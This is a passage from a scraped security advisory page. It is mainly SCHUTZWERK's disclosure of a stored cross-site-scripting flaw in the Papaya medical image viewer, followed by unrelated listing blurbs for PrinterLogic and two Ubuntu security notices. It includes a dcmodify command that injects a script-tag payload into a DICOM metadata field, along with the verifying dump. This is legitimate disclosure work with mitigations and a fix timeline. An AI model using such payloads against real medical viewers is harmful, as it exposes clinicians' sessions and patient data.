was found to contain a stored cross-site-scripting vulnerability. The  
application uses the Papaya JavaScript software[0] published by the Research  
Imaging Institute belonging to the University of Texas Health Science   
Center[1].

The software is described as "[..] a pure JavaScript medical research image  
viewer, supporting DICOM and NIFTI formats, compatible across a range of web  
browsers [..]". It can be used stand-alone or integrated into larger medical  
applications, has 192 forks and 488 stars on GitHub and was used in at   
least 50  
published academic research papers[2].

One of the main features is to open medical images of multiple formats,   
which  
can be achieved via the context menu "File - Add image...". Papaya then   
displays  
the image and adds a new icon in the upper right corner of the viewer.   
This icon  
allows to open another context menu to edit the previous opened image as   
a layer  
in multiple ways. The option of interest for the cross-site-scripting  
vulnerability is the "Show Header" entry, which allows getting further  
information about the medical image.

An example DICOM[3] zip archive was downloaded[4], extracted and opened in  
Papaya. The "Show Header" function shows multiple entries including private  
patient data fields like patient ID, name, date of birth and gender.

The DICOM ToolKit (DCMTK)[5] offers multiple tools to analyze, create   
and edit  
DICOM images. The metadata field "Manufacturer" of the previously downloaded  
DICOM image was edited with help of the DCMTK tool dcmodify:

DICTPATH=/tmp/share/dcmtk/dicom.dic dcmodify -m  
"Manufacturer=<script>alert(1)</script>" 2_skull_ct/DICOM/I0

The DCMTK tool dcmdump can be used to verify the manipulated metadata entry:

dcmdump 2_skull_ct/DICOM/I0

[..]  
# Dicom-Data-Set  
[..] (0008,0070) LO [<script>alert(1)</script>]              #  26, 1   
Unknown  
Tag & Data [..]

Viewing the header information of the manipulated DICOM image in Papaya   
executes  
the injected JavaScript code in the web browser.

SCHUTZWERK decided to publish the still existing vulnerability (commit   
4a42701),  
since the vendor did not implement any remediation several months after new  
contributors have been introduced to the project.

Solution/Mitigation  
===================

Several mitigation recommendations have been sent to the vendor. These   
include  
common mitigation strategies from OWASP[6], like escaping user   
controlled input  
and the usage of popular JavaScript libraries like DomPurify[7].

As a quick workaround, the context menu, which allows showing header   
information  
can be disabled by setting the variable kioskMode to true.

Disclosure timeline  
===================

2020-08-20: Vulnerability discovered 2020-08-20: Vulnerability reported to  
             vendor  
2020-09-30: Contacted vendor again  
2020-09-30: Vendor responds and asks for mitigation ideas  
2020-10-01: Response to vendor with detailed information and mitigation   
ideas  
2020-11-09: Contacted vendor again for any status updates  
2022-08-30: Retest of the customer application including the Papaya web  
             application  
2022-09-21: Notified vendor of intention to publish advisory  
2022-10-18: Vendor notified SCHUTZWERK of new contributors who will   
maintain the  
             project  
2023-04-19: Informed vendor about publication deadline on May 15, 2023  
2023-05-08: Vendor replied with intention to fix vulnerability until May   
15,2023  
2023-05-15: Vulnerability fixed by vendor  
2023-05-26: Advisory published by SCHUTZWERK

Contact/Credits  
===============

The vulnerability was discovered during an assessment by Lennert Preuth of  
SCHUTZWERK GmbH.

References  
==========

[0] https://github.com/rii-mango/Papaya  
[1] https://rii.uthscsa.edu/  
[2] http://mangoviewer.com/pubs.html  
[3] https://en.wikipedia.org/wiki/DICOM  
[4] https://medimodel.com/sample-dicom-files/human_skull_2_dicom_file/  
[5] https://dicom.offis.de/dcmtk.php.de  
[6] https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_  
     Prevention_Cheat_Sheet.html  
[7] https://github.com/cure53/DOMPurify

Disclaimer  
==========

The information in this security advisory is provided "as is" and without  
warranty of any kind. Details of this security advisory may be updated   
in order  
to provide as accurate information as possible. The most recent version   
of this  
security advisory can be found at SCHUTZWERK GmbH's website.  
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmRwkEgaHGFkdmlzb3Jp  
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrvCEA//YsP7ZUvk9VLzp49DtsMP  
HQF0ojoBmNZOi5fymVDRGScmMT5VLOsdp9EUEywPYxmxo1rPc4vv6gM3hQsQ7TRO  
oAb9ZeZjvYy2Nyz6cy3wX4H2naFOHEr085Uwpg9pX5DAHkQVsseTi/n04u5PT5xP  
Fnuozie/KOG4pmkkKFHmG6aWgUSXWZuq8japOghl6g35BmG7ntXG2OYsb7f5ITYw  
ksRbJt+8wetrBsa/pR6ZfEkoEpyuFZg85EDpDRoBPVlGZtuSF6dh+WfO+9VQBjLE  
dZwPRaXefHp/v89rEfWvkX3JGmGWh6P8KQ+puF3GHLcBa8iDIbW/HPfQHGuGhfIa  
upZ1E+HtgpxInxelM/BcFKXSjD4AMnAULa2C6nWsdmw8GIKHHus+WQuK1z40R7N4  
Vji59buH9SBWAWb7MuyRrdxoZSmAuxcR7lXVzHMxSOZm0W7J0d9luLL8XUn4kj8+  
tRE24TgbdGyAYr/V6BO9RiYCtyWPji5VBtwFZLFlvKRo81zyS9nve651nWS7Fv/l  
OGns4fGbEZ+sm/YuFdfyzg8TMJ0pqV0AswCnx9mSqWn3RRBHg55pE4i6IyUdofu/  
eiaTl33oyGolW7rQ5ATtmsOgKp5jKb7rt3WVSBLn1D9+JJ8MfbDrvyUoTkIZaqEp  
4bKAQKWvxQG8GpbKuQT4on0=  
=IEuk  
-----END PGP SIGNATURE-----

--   
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany  
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

advisories@schutzwerk.com / www.schutzwerk.com

Geschäftsführer / Managing Directors:  
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm / HRB 727391  
Datenschutz / Data Protection www.schutzwerk.com/datenschutz

Papaya Medical Viewer 1.0 Cross Site Scripting

PrinterLogic build version 1.0.757 suffers from authentication bypass, cross site request forgery, cross site scripting, session fixation, insufficient checks, impersonation, remote SQL injection, and various other vulnerabilities.

PrinterLogic Build 1.0.757 XSS / SQL Injection / Authentication Bypass

Ubuntu Security Notice 6121-1 - It was discovered that Nanopb incorrectly handled certain decode messages. An attacker could possibly use this cause a denial of service or expose sensitive information. It was discovered that Nanopb incorrectly handled certain decode messages. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6121-1May 30, 2023nanopb vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in Nanopb.Software Description:- nanopb: Protocol Buffers with small code sizeDetails:It was discovered that Nanopb incorrectly handled certain decode messages.An attacker could possibly use this cause a denial of service or exposesensitive information. (CVE-2020-26243)It was discovered that Nanopb incorrectly handled certain decode messages.An attacker could possibly use this issue to cause a denial of serviceor execute arbitrary code. (CVE-2021-21401)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS (Available with Ubuntu Pro):  nanopb                          0.4.1-1ubuntu0.1~esm1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6121-1  CVE-2020-26243, CVE-2021-21401

Ubuntu Security Notice USN-6121-1

Ubuntu Security Notice 6120-1 - Several security issues were discovered in the SpiderMonkey JavaScript library. If a user were tricked into opening malicious JavaScript applications or processing malformed data, a remote attacker could exploit a variety of issues related to JavaScript security, including denial of service attacks, and arbitrary code execution.

    ==========================================================================Ubuntu Security Notice USN-6120-1May 30, 2023mozjs102 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.10- Ubuntu 22.04 LTSSummary:Several security issues were fixed in SpiderMonkey.Software Description:- mozjs102: SpiderMonkey JavaScript libraryDetails:Several security issues were discovered in the SpiderMonkey JavaScriptlibrary. If a user were tricked into opening malicious JavaScriptapplications or processing malformed data, a remote attacker could exploita variety of issues related to JavaScript security, including denial ofservice attacks, and arbitrary code execution.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   libmozjs-102-0                  102.11.0-0ubuntu0.23.04.1Ubuntu 22.10:   libmozjs-102-0                  102.11.0-0ubuntu0.22.10.1Ubuntu 22.04 LTS:   libmozjs-102-0                  102.11.0-0ubuntu0.22.04.1After a standard system update you need to reboot your computer to make allthe necessary changes.References:   https://ubuntu.com/security/notices/USN-6120-1   CVE-2023-25735, CVE-2023-25739, CVE-2023-25751, CVE-2023-29535,   CVE-2023-29536, CVE-2023-29548, CVE-2023-29550, CVE-2023-32211,   CVE-2023-32215Package Information:   https://launchpad.net/ubuntu/+source/mozjs102/102.11.0-0ubuntu0.23.04.1   https://launchpad.net/ubuntu/+source/mozjs102/102.11.0-0ubuntu0.22.10.1   https://launchpad.net/ubuntu/+source/mozjs102/102.11.0-0ubuntu0.22.04.1

Source

Packet Storm